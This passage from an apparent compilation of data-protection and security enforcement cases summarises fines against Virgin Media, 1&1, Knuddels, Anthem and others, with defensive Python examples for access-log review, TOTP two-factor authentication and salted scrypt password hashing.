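    _, break_glass, unjustified = classify(events, CARE_TEAM)
    return {
        "unjustified": [(ev["patient"], ev["user"]) for ev in unjustified],
        "break_glass": [(ev["patient"], ev["user"]) for ev in break_glass],
        "clusters": lookup_clusters(unjustified),
    }


if __name__ == "__main__":
    findings = review()
    for patient, user in findings["unjustified"]:
        print(f"ALERT  unjustified access  patient={patient} user={user}")
    for patient, user in findings["break_glass"]:
        print(f"REVIEW break-glass access  patient={patient} user={user}")
    for patient, users in findings["clusters"].items():
        print(f"ALERT  lookup cluster      patient={patient} users={','.join(users)}")
```

Run daily, the cluster rule alone would have flagged the incident described above on the first day; the per-event rule is what makes the logging requirement of Art. 32 mean something in practice.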
Virgin Media Limited
[cybersecurity] Virgin Media Limited left a marketing database containing the personal data of approximately 900,000 customers misconfigured and publicly accessible online for about ten months, between April 2019 and February 2020. The ICO found that Virgin Media had not conducted a Data Protection Impact Assessment for the database, had not applied basic access controls, and had no procedures for regular security testing; the misconfiguration was discovered by an external security researcher rather than by Virgin Media's own monitoring. The exposed data included names, home addresses, email addresses, and phone numbers.
€585,000
Booking.com B.V.
[cybersecurity] Booking.com failed to report a personal data breach to the AP within the mandatory 72-hour window under GDPR Art. 33, notifying 22 days late. In December 2018, fraudsters used phishing against hotel partners to take over partner accounts and obtained the personal data of 4,109 customers, including payment card details for several hundred of them. The AP found that Booking.com's internal escalation procedures had failed to trigger timely regulatory reporting and that affected customers were also not promptly informed.
€475,000
TIM S.p.A. (Telecom Italia)
[technology] The Garante imposed a €27.8 million fine on TIM for numerous GDPR violations: unsolicited marketing calls (including to individuals on do-not-call lists), activation of services without consent, collection of consent through an app that relied on dark patterns, and inadequate data retention policies.
€27.8M
DSG Retail Limited (Currys PC World)
[cybersecurity] DSG Retail Limited (Currys PC World) was fined £500,000, the maximum penalty under the Data Protection Act 1998, following an intrusion between July 2017 and April 2018 in which attackers installed malware on 5,390 point-of-sale terminals in Currys PC World and Dixons Travel stores, compromising 5.6 million payment cards and some 14 million records of other personal data such as names, postcodes and email addresses. The ICO found DSG had inadequate patch management and no vulnerability scanning programme, and that the absence of basic security monitoring let the nine-month compromise go undetected. The violations predated GDPR, so the fine was capped at the maximum available under the DPA 1998 regime.
€585,000
1&1 Telecom GmbH
[cybersecurity] The Federal Data Protection Commissioner (BfDI) fined 1&1 Telecom GmbH €9.55 million for a grossly inadequate customer-service authentication procedure that let any caller obtain another person's account information (including contact details, contract terms and phone numbers) simply by giving the target's name and date of birth, both obtainable from public sources. The BfDI found that these two knowledge factors were categorically insufficient given the sensitivity of the account data disclosed and that the procedure constituted a systemic GDPR Art. 32 failure. On appeal, the Bonn Regional Court upheld the finding of a violation but reduced the fine to €900,000.
€9.6M
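Both the Transavia and the 1&1 findings above come down to authentication resting on a single factor that an attacker can guess or look up. The following is an added example, not code from either company, of the second factor most commonly added: a time-based one-time password per RFC 6238 (HOTP from RFC 4226 with a time-derived counter), with a small clock-skew window, constant-time comparison, and a replay guard that rejects any counter already accepted. `authenticate` shows how it combines with whatever first-factor check a service already does. The shared secret used here is the published RFC 4226/6238 test-vector key, so the codes can be checked against the RFCs.

```python
"""TOTP (RFC 6238) over HOTP (RFC 4226) as a second authentication factor.
Added example, not from Transavia's or 1&1's systems; TEST_SECRET is the
published RFC test-vector key."""
import hashlib
import hmac
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the big-endian 8-byte counter, dynamic truncation,
    then reduce modulo 10^digits and left-pad with zeros."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, for_time: float, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP with the counter derived from Unix time in `step`-second slots."""
    return hotp(secret, int(for_time) // step, digits)


def verify_totp(secret: bytes, code: str, for_time: float, last_counter: int = -1,
                window: int = 1, step: int = 30):
    """Return the counter that matched, or None.

    Accepts +/- `window` time steps of clock skew, compares in constant time, and
    refuses any counter <= last_counter so a captured code cannot be replayed.
    The caller must persist the returned counter per user for that to hold."""
    if not (code.isdigit() and 6 <= len(code) <= 8):
        return None
    now_counter = int(for_time) // step
    for c in range(now_counter - window, now_counter + window + 1):
        if c <= last_counter:
            continue
        if hmac.compare_digest(hotp(secret, c, len(code)), code):
            return c
    return None


def authenticate(knowledge_ok: bool, secret: bytes, code: str, for_time: float,
                 last_counter: int):
    """Two independent factors.  `knowledge_ok` is the outcome of the service's
    existing first-factor check (a password, or the name + date of birth that 1&1
    relied on); the OTP proves possession of the enrolled device.  Returns
    (success, new_last_counter); either factor failing fails the login."""
    if not knowledge_ok:
        return False, last_counter
    matched = verify_totp(secret, code, for_time, last_counter)
    if matched is None:
        return False, last_counter
    return True, matched


# RFC 4226 / RFC 6238 test-vector secret (ASCII "12345678901234567890").
TEST_SECRET = b"12345678901234567890"

if __name__ == "__main__":
    print("code for the current 30-second slot:", totp(TEST_SECRET, time.time()))
```

A TOTP secret is only as good as the enrolment and storage around it, but even this minimal implementation would have stopped both attacks described above: a guessed password or a looked-up date of birth no longer suffices on its own.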
Deutsche Wohnen SE
[technology] The Berlin Commissioner for Data Protection (BlnBDI) fined real estate company Deutsche Wohnen SE €14.5 million for using an archiving system for tenant personal data (including proof of income, employment history, tax documents, health insurance details and bank account information) that had no provision for deleting documents no longer required, violating GDPR Arts. 5(1)(e) and 25. The case generated significant EU legal debate: in 2021 the Berlin Regional Court discontinued the fine proceedings on the ground that, under German administrative-offence law, a company can only be fined for an infringement attributable to one of its managers; on appeal the Berlin Court of Appeal (Kammergericht) referred the question of direct corporate liability to the CJEU, which held in Case C-807/21 (December 2023) that a company may be fined directly for a GDPR infringement committed intentionally or negligently, without the infringement having to be attributed to an identified natural person.
€14.5M
Google LLC / YouTube LLC
[technology] The FTC and the New York Attorney General imposed a combined $170 million penalty ($136 million to the FTC and $34 million to New York) on Google and YouTube for violating COPPA by collecting persistent identifiers, used for targeted advertising, from viewers of child-directed YouTube channels without notifying parents or obtaining verifiable parental consent. YouTube knew many channels were child-directed and marketed itself to toy companies as a leading destination for children, while telling some advertisers it had no users under 13 and serving behavioural advertising to those channels' audiences. It was the largest COPPA penalty in US history at the time.
€156.4M
Meta Platforms Inc. (Facebook)
[technology] The FTC imposed a record $5 billion civil penalty on Facebook for multiple violations of its 2012 consent order, which required affirmative user consent before sharing data with third parties beyond users' privacy settings; the most visible violation was the Cambridge Analytica episode, in which data from approximately 87 million users was harvested without consent through a third-party app. The FTC found Facebook had made repeated misrepresentations about user privacy and the effectiveness of its privacy controls. The order imposed far-reaching structural requirements, including an independent privacy committee of Facebook's board and quarterly privacy certifications by CEO Mark Zuckerberg personally.
€4.6B
Knuddels GmbH & Co. KG
[cybersecurity] The Baden-Württemberg State DPA (LfDI BW) imposed Germany's first GDPR fine, a deliberately modest €20,000, on the German social networking platform Knuddels for storing users' passwords in plaintext, so that when the platform was breached in July 2018 the attackers obtained approximately 330,000 directly usable email-and-password pairs, within a larger dump of nearly 2 million user records. The LfDI explicitly set the fine low to reward an exemplary breach response: Knuddels proactively notified the authority, publicly disclosed the breach in detail, moved to proper password hashing immediately, and co-operated fully with the investigation.
€20,000
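The Knuddels decision turns on a single design choice: a plaintext password column means any copy of the database is immediately a list of working credentials. The following is an added example, not Knuddels' code, of the plaintext scheme beside the remedy the regulator credited the company with adopting, salted memory-hard hashing (scrypt from the Python standard library) with a self-describing stored format and a constant-time verifier. `leaked_passwords` shows what an attacker holding a dump of each kind of table can actually log in with. The user records are constructed.

```python
"""Password storage: plaintext beside salted scrypt hashing.  Added example, not
Knuddels' code; the credentials table below is constructed."""
import base64
import hashlib
import hmac
import os
from typing import Optional

# scrypt cost parameters: N=2^14, r=8 uses about 16 MiB per hash, which is the
# point; a GPU cracking rig has to pay the same memory cost per guess.
SCRYPT_N, SCRYPT_R, SCRYPT_P, DKLEN = 2 ** 14, 8, 1, 32


def store_plaintext(password: str) -> str:
    """What a plaintext store amounts to: whoever can read the column has the password."""
    return password


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'scrypt$N$r$p$<salt b64>$<hash b64>'.

    A fresh 16-byte random salt per user makes identical passwords hash differently
    and defeats precomputed tables; storing N/r/p alongside lets the cost be raised
    later without breaking verification of older records."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    b64 = lambda b: base64.b64encode(b).decode("ascii")
    return f"scrypt${SCRYPT_N}${SCRYPT_R}${SCRYPT_P}${b64(salt)}${b64(digest)}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and parameters and compare in constant time.
    Malformed records verify as False rather than raising."""
    try:
        scheme, n, r, p, salt_b64, digest_b64 = stored.split("$")
        if scheme != "scrypt":
            return False
        salt, expected = base64.b64decode(salt_b64), base64.b64decode(digest_b64)
        candidate = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                                   n=int(n), r=int(r), p=int(p), dklen=len(expected))
    except (ValueError, TypeError):
        return False
    return hmac.compare_digest(candidate, expected)


def leaked_passwords(table: dict) -> dict:
    """What an attacker holding a dump of the credentials table can log in with:
    the password itself for plaintext rows, nothing directly usable for hashed rows."""
    return {user: (None if value.startswith("scrypt$") else value)
            for user, value in table.items()}


# Constructed credentials table, one user stored each way.
TABLE = {
    "alice": store_plaintext("correct horse battery staple"),
    "bob": hash_password("correct horse battery staple"),
}

if __name__ == "__main__":
    for user, pw in leaked_passwords(TABLE).items():
        print(f"{user}: {'recoverable: ' + pw if pw else 'not directly recoverable'}")
    print("bob verifies:", verify_password("correct horse battery staple", TABLE["bob"]))
```

Hashing does not make a breach harmless, since weak passwords can still be guessed offline, but it converts "every account is compromised" into "accounts with guessable passwords are at risk", which is the difference the regulator was pricing when it set the fine.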
Anthem Inc.
[cybersecurity] Anthem Inc. agreed to pay $16 million to HHS OCR, the largest HIPAA settlement at the time, following a cyberattack discovered in January 2015 that compromised the electronic protected health information of approximately 78.8 million individuals, the largest healthcare data breach in US history. HHS OCR found Anthem had not conducted an enterprise-wide HIPAA security risk analysis, had insufficient procedures to regularly review information system activity, had failed to identify and respond to suspected or known security incidents, and lacked adequate minimum-access controls to prevent the attackers from reaching the data. The settlement also required a comprehensive corrective action plan monitored for two years.
€14.7M
ING Bank N.V.
[finance] ING Bank N.V. entered into a €775 million out-of-court settlement (transactie) with the Dutch Public Prosecution Service for systemic AML failures spanning multiple years, including critically deficient customer due diligence that allowed clients to launder money through ING accounts undetected. The settlement comprised a €675 million fine and €100 million in disgorgement of unlawfully obtained gains, making it the largest corporate crime settlement in Dutch history at the time. In December 2020 a Dutch court ordered the prosecution of ING's former chief executive personally in connection with the failures.
€775M